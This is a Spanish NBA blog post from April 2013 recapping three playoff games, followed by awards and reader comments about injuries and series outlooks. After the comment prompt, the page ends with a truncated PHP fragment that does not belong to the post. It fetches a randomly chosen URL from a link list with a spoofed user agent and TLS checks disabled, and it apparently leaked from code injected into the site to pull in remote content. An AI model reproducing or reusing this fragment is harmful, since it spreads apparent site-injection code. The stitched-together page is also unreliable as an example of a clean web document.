La Crónica: Guerra de guerrillas

26 de April de 2013 por txusma

Grizzlies y Bulls se llevaron la victoria en casa como les gusta: trasladando la lucha a las trincheras, peleando por cada balón como si fuera el último, ahogando a los rivales, dejándose la piel, punteando todos los tiros, molestando con brazos en alto… En Chicago los Nets empezaron fuertes y se llegaron a poner 17-5 en el primer cuarto pero a partir de ahí, los Bulls ajustaron, bajaron el culo y se conjuraron para llevar el partido a su terreno. A partir de ahí, colapso de los de Brooklyn. Parcial de 17-36 con sólo 1 canasta de los siguientes 26 intentos. El ataque de Chicago tampoco era para tirar cohetes pero eso ya les va bien a los Thibodeau que llegaron con 13 puntos de ventaja y el partido controlado al último cuarto. Se mantuvieron firmes durante 7 minutos, momento en que anotaron su última canasta en juego. Los Nets apretaron los dientes y limaron las diferencias poco a poco pero Chicago convirtió cada canasta en un parto y el tiempo y la energía no dio para más (76-79). Segunda victoria para Chicago y problemas para Brooklyn.

Los Grizzlies saben que los Clippers están construidos en torno a Chris Paul. Anularle a él es anular completamente a la franquicia californiana. Ayer Paul anotó sólo 8 puntos y perdió 5 balones lo que arrastró a su equipo a una clara derrota. Los de Memphis les superaron claramente en el aspecto reboteador (cogieron 17 rebotes en ataque), ahogaron su juego exterior y recuperaron al mejor Randolph. Con estos ingredientes y el apoyo de sus aficionados, tuvieron suficiente para hacer naufragar a los Clippers (82-94). La serie no estaba acabada, ni mucho menos. 

En Milwaukee, Brandon Jennings saltaba a la cancha con el objetivo de mantener su pronóstico en pie pero la ilusión duró hasta donde siempre: mitad del tercer cuarto, principio del cuarto. Es ahí donde Miami se pone siempre las pilas, mete una marcha más y deja atrás a sus rivales. Wade estuvo muy desacertado en el tiro pero distribuyó con fluidez y el acierto de jugadores como Ray Allen (nuevo récord de triples anotados en partidos de playoffs), Chris Andersen, Udonis Haslem o, sobretodo, Chris Bosh permitió a Lebron tomarse el partido con calma (104-91). El 4-0 se otea ya en el horizonte.

PREMIOS

MVP: Carlos Boozer y Zach Randolph fueron los estiletes de sus equipos en las respectivas victorias cosechadas. El de los Bulls consiguió 22 puntos y 16 rebotes y el de Grizzlies 27 puntos y 11 rebotes.

Sorpresa: Otro buen partido de Ray Allen que esta vez le sirvió incluso para batir el récord absoluto de triples anotados en partidos de playoffs. Acabó con 23 puntos y un 5 de 8 en triples.

Decepción: Día para olvidar del backcourt de los Clippers. Jamal Crawford acabó con 10 puntos con un 3 de 10, Chris Paul con 8 puntos con un 4 de 11 y 5 pérdidas y Eric Bledsoe se quedó sin anotar tras fallar los 4 tiros a canasta que intentó.

Esfuerzo en vano: Se le tuercen las cosas a los Nets a pesar del buen papel de Brook Lopez, autor de 22 puntos, 9 rebotes y 7 tapones.

Imágenes | AP Photos / Getty Images

Comenta

25 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Eliminatorias que se ponen interesantes. Dejando a un lado un nuevo paseo de los Heat que se permitieron dar descanso casi todo el último cuarto a LeBron y la victoria ni estuvo cerca de complicarse. Los Bucks ya son muy conscientes de su inferioridad y el 4-0 es más que probable como se esperaba al principio.
    En la eliminatoria de la que saldrá el rival de los Heat en segunda ronda, los Nets siguen complicándose la vida contra los rocosos Bulls. Al principio pareció que había vuelto la fluidez del primer partido en los Nets y a mitad del primer cuarto ganaban 17-4. Pero hasta ahí llegó la cosa. Chicago bajo el culo, se puso a defender y metió el partido en lo que le combiene, ataques a media cancha, sudores y mareos para anotar y lucha sin término a ambos lados. El resultado fue que remontaron y llegaron al último cuarto claramente por delante. Ahí una pequeña racha de Deron y la lucha y buen hacer de Lopez levantaron algo a su equipo para morir en la orilla con un último triple fallado en busca de la prórroga.
    En los Nets, está claro que con Deron como estos dos últimos partidos van a sufrir muchísimo. Él es el que marca el ritmo y tras un primero fantástico lleva dos partidos metido en la maraña defensiva de los Bulls. Sin él, los Nets se colapsan en ataque y los partidos entran en terreno Bull donde la intensidad de Deng, Gibson, Noah y demás les hace ser mejores. En el 4º ya les será urgente dar un giro a lo visto e intentar que el partido sea más fluido si no se quieren ver al borde del precipicio.
    Mientras en la costa Oeste, los Grizzlies demostraron que están dispuestos a que la suya sea una serie larga y competida. Esta vez ganaron todos los terrenos de esfuerzo y concentración. Menos balones perdidos, más pérdidas del rival, más rebotes (especialmente en ataque) y una defensa muy intensa sobre los exteriores que dejó fuera de partido a Paul&Crawford. Además primer gran partido de Z-Bo esta vez sin problemas de faltas. Los Clippers no deben dejar que el partido se baje a lucha cuerpo a cuerpo en medio campo y deben aprovechar su mejor movilidad y físico para poner de nuevo el ritmo que les interesa. Será difícil que CP3 vuelva a tener un día tan malo así que el 4º se plantea como el partido de la verdad para ver si hay series o se acaba la historia. De momento, los de Memphis siguen muy vivos a pesar de las malísimas series que está haciendo Tayshaun Prince.
    Y hoy los históricos Celtics y Lakers se juegan sus últimas opciones de permanecer con vida real en estos PO. Por lo visto hasta ahora complicado para los dos, veremos si al abrigo de sus míticas canchas la cosa cambia. Y un interesantísimo Warriors-Nuggets para ver si los de la Bahía creen incluso sin Lee en ganar las series a base de triplazos.

      Citar

  2. Esteban dice:
    #2

    q PO para brook LOPEZ, despejando todas las dudas que habia sobre el,

    no llevara a un equipo al campeonato, pero sin dudas puede ser la segunda espada de un equipo contendiente

      Citar

  3. HisRoyalAirness dice:
    #3

    Lo de Chris Paul con los árbitros aún puedo entenderlo porque ya tiene unos añitos, pero quién coño se cree Griffin que es protestandolo todo y hablando con ellos como si fuese Larry Bird? Maldito equipo de lloricas, me ponen enfermo.
    Qué defensa de los Grizzlies, qué maravilla. No en plan abrase físico y llegando a puntear todo como los Heat sino de lo más inteligente y disciplinada que recuerdo.

      Citar

  4. Ruxixón dice:
    #4

    Los Nets deberían plantearse dar cabida a Blatche en el quinteto o bien darle cerca de 30 mpp porque necesitan todas las vías posibles para anotar.Con Gerald Wallace y Evans jugando muchos minutos sólo contribuyes a entrar en el juego de Chicago.Hasta los PO’s tenía confianza en Carlesimo pero tras el primer partido y los ajustes de Thibo me he dado cuenta que los Nets necesitan otro coach al frente.Vamos a ver ese 4º partido,clave,en Chicago.

      Citar

  5. Ruxixón dice:
    #5

    Sorpresón absoluto: Westbrook desgarro de menisco,fuera un plazo de 4-6 semanas según algunas informaciones.Esta fue la acción que lo lesionó (aquí fue donde empezó el pique con Beverley,recuerdo que RW siguió jugando).

      Citar

  6. Jose Luis dice:
    #6

    Westbrook se opera el menisco… pueden ser dos semanas como Peace o mes y medio y adiós PO… si no llegan a ponerse 2-0 OKC, hubiera dicho que los Rockets les eliminaban (que aún es posible).

      Citar

  7. nba dice:
    #7

    Otia !!! que los rockets pueden llegar a segunda ronda a no ser que “El pescador” rejuvenezca

      Citar

  8. Blade Petrovich dice:
    #8

    Puede fichar OKC al agente zero?
    Para mí supliria a westbrook mejor que Jackson

      Citar

  9. Txusma dice:
    #9

    Veo a Tim Duncan en las finales!!

      Citar

  10. Jose Luis dice:
    #10

    Txusma:
    Veo a Tim Duncan en las finales!!

    Espero que no xD

      Citar

  11. oli dice:
    #11

    Lo que es increíble si se confirma que westbrook se pierde los playoffs, es que la mayoría de los favoritos han tenido o tiene problemasde lesiones menos los heat que son el mejor equipo y máximo favorito pero con estas lesiones le deja el camino más fácil y menos interesante

      Citar

  12. Esteban dice:
    #12

    jajajajaja el perder a westbrook es grave, pero mas grave aun si miramos los posibles reemplazantes

    sin russell el thunder saldria a la cancha con fisher de base, o sea, todos los puntos los tendria que hacer durant
    lo q obliga a poner a martin de 2 titular, salvo q durant demuestre q puede anotar el 85% de los puntos de su equipo

    esto desmembra a la banca completamente

    jeremy lamb y perry jones son los mejores jugadores ofensivos del thunder detras de durant, mamita

      Citar

  13. Esteban dice:
    #13

    detras de durant y martin queria decir

      Citar

  14. Esteban dice:
    #14

    la otra es que reggie jackson salte de titular, en la liga de desarrollo se cansa de meter puntos, quiza sea su oportunidad

      Citar

  15. MagicJohnson32 dice:
    #15

    Blade Petrovich:
    Puede fichar OKC al agente zero?
    Para mí supliria a westbrook mejor que Jackson

    Sí que pueden. Y a Allen Iverson también, jeje.

      Citar

  16. Blade Petrovich dice:
    #16

    Pues yo los ficharia. Arenas dijo que no queria NBA pero Iverson ultimo intento de ir a por el anillo!!

      Citar

  17. MagicJohnson32 dice:
    #17

    No, no, era broma, ahora no se pueden fichar agentes libres. Supongo que vamos a ver muchos minutos de Reggie Jackson, que personalmente me gusta bastante, y algunos más de Fisher, pero sobre todo Durant va iniciar la mayoría de las jugadas. Tal vez Brooks pruebe minutos sin base puro, con Sefolosha, Martin y KD por fuera. Lo veo viable tanto en defensa, porque Sefolosha puede defender al base rival, como en ataque, con Durant partiendo de la posición 1.

      Citar

  18. Esteban dice:
    #18

    Delonte west YA y jordan farmar de ser posible y al menos sufririan algo menos

      Citar

  19. Esteban dice:
    #19

    Vaya basquet estan desplegando los knicks, pero resulta dificil imaginarlos conm esta formacion enfrentando al heat, shumpert sobre lebron y prigioni o felton sobre wade seria un abuso sin precedentes
    Un entrenador defensivo como woodson debe tener pensando algo para frenar al heat

    Imagino muchos minutos de white y coopeland en cancha lo q desarmaria la doble base q tan buenos resultados le esta dando,
    Melo no puede ir sobre lebron y en su casa, un interno como martin no puede ir sobre battier

    Son dos equipos muy dispares

    Por otra parte, los pacers estaran esperando con gusto para q west masacre a melo en el juego interior y george mirepara abajo a shumpert

    A lo q voy, todo muy lindo los knicks, pero van a tener q cambiar mucho su forma de jugar en las proximas series

      Citar

  20. Denise dice:
    #20

    lakers 11 abajo al descanso. Tiene pinta de 3-0. Mal Spurs ó se estan dosificando, deberian ir ganando de 25 a un equipo sin Kobe, Nash, Meeks y Blake, y con Metta WP medio cojo.
    Pero Parker haciendo un hijo a Morris cuando quiere.

      Citar

  21. Lucho dice:
    #21

    En un canal tengo la exhibición de Curry y Jack. En el otro, otra clase mas de Timmy-D. Se impone zapping, claramente

      Citar

  22. Melo15 dice:
    #22

    Que futuro que tiene Harrison Barnes!! Ha demostradl que no se arruga en PO y eso que tiene 20 añitos.
    Yo si fuera lel GM de los Warriors le empezaba a dar mas responsabilidades desde ya y echas a Thompson que es bueno pero no me acaba de gustar al lado de Curry.

      Citar

  23. Ruxixón dice:
    #23

    Creo que clarísimamente dará más cancha a Reggie Jackson,dejando a Kevin Martín en el banquillo.Eso y más minutos para Fisher está claro.

    Palizon absoluto a Lakers e inoperancia e impotencia en los Celtics,nada de vasos comunicantes,los dos están en el peor momento en años.Verano largo con muchas decisiones en ambas franquicias.

      Citar

  24. Denise dice:
    #24

    Melo15:
    Que futuro que tiene Harrison Barnes!! Ha demostradl que no se arruga en PO y eso que tiene 20 añitos.
    Yo si fuera lel GM de los Warriors le empezaba a dar mas responsabilidades desde ya y echas a Thompson que es bueno pero no me acaba de gustar al lado de Curry.

    Joder Melo, Klay Thompson es un animal del perímetro y tiene 22 años. Los Warriors tienen un proyecto ganador para años, lo único que deben hacer es esperar un poco de tiempo hasta el verano del año que viene cuando se ahorran 25 kilos en Bogut y Biedrins, y comenzaran la 14/15 con una base Lee-Curry-Barnes-Thompson-Ezeli más una masa salarial de casi 40 millones. Imaginate lo que pueden armar para la 14/15 si consiguen fichar bien.

      Citar

  25. Denise dice:
    #25

    Ruxixón:

    Palizon absoluto a Lakers e inoperancia e impotencia en los Celtics,nada de vasos comunicantes,los dos están en el peor momento en años.Verano largo con muchas decisiones en ambas franquicias.

    Hombre, en teoría, los Lakers para el año que viene van a seguir teniendo equipo para clasificarse para Playoffs en el salvaje Oeste, y su reconstrucción empezaría pronto cuando en 2014 Kobe acabe su contrato.
    Por mucho que D’Antoni sea un paquete, no olvidemos la mala suerte que han tenido con las lesiones.

    Lo de Boston tiene más mala pinta, los dos proximos años, salvo giro de rumbo del GM, se avecinan como muy chungo para ellos, con los contratos de estrella invertidos en gente muy vieja, y con contratos muy altos para jugadores normalitos (Bass, Lee, Green y Terry). La conferencia Este tiene poco nivel y a lo mejor les da para clasificarse para Playoffs, pero poco más. Además, equipos como Cleveland, Washington, Orlando o Detroit, en teoría van a tener mejor equipo que este año.

    Ya se verá lo que cada uno puede fichar y traspasar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>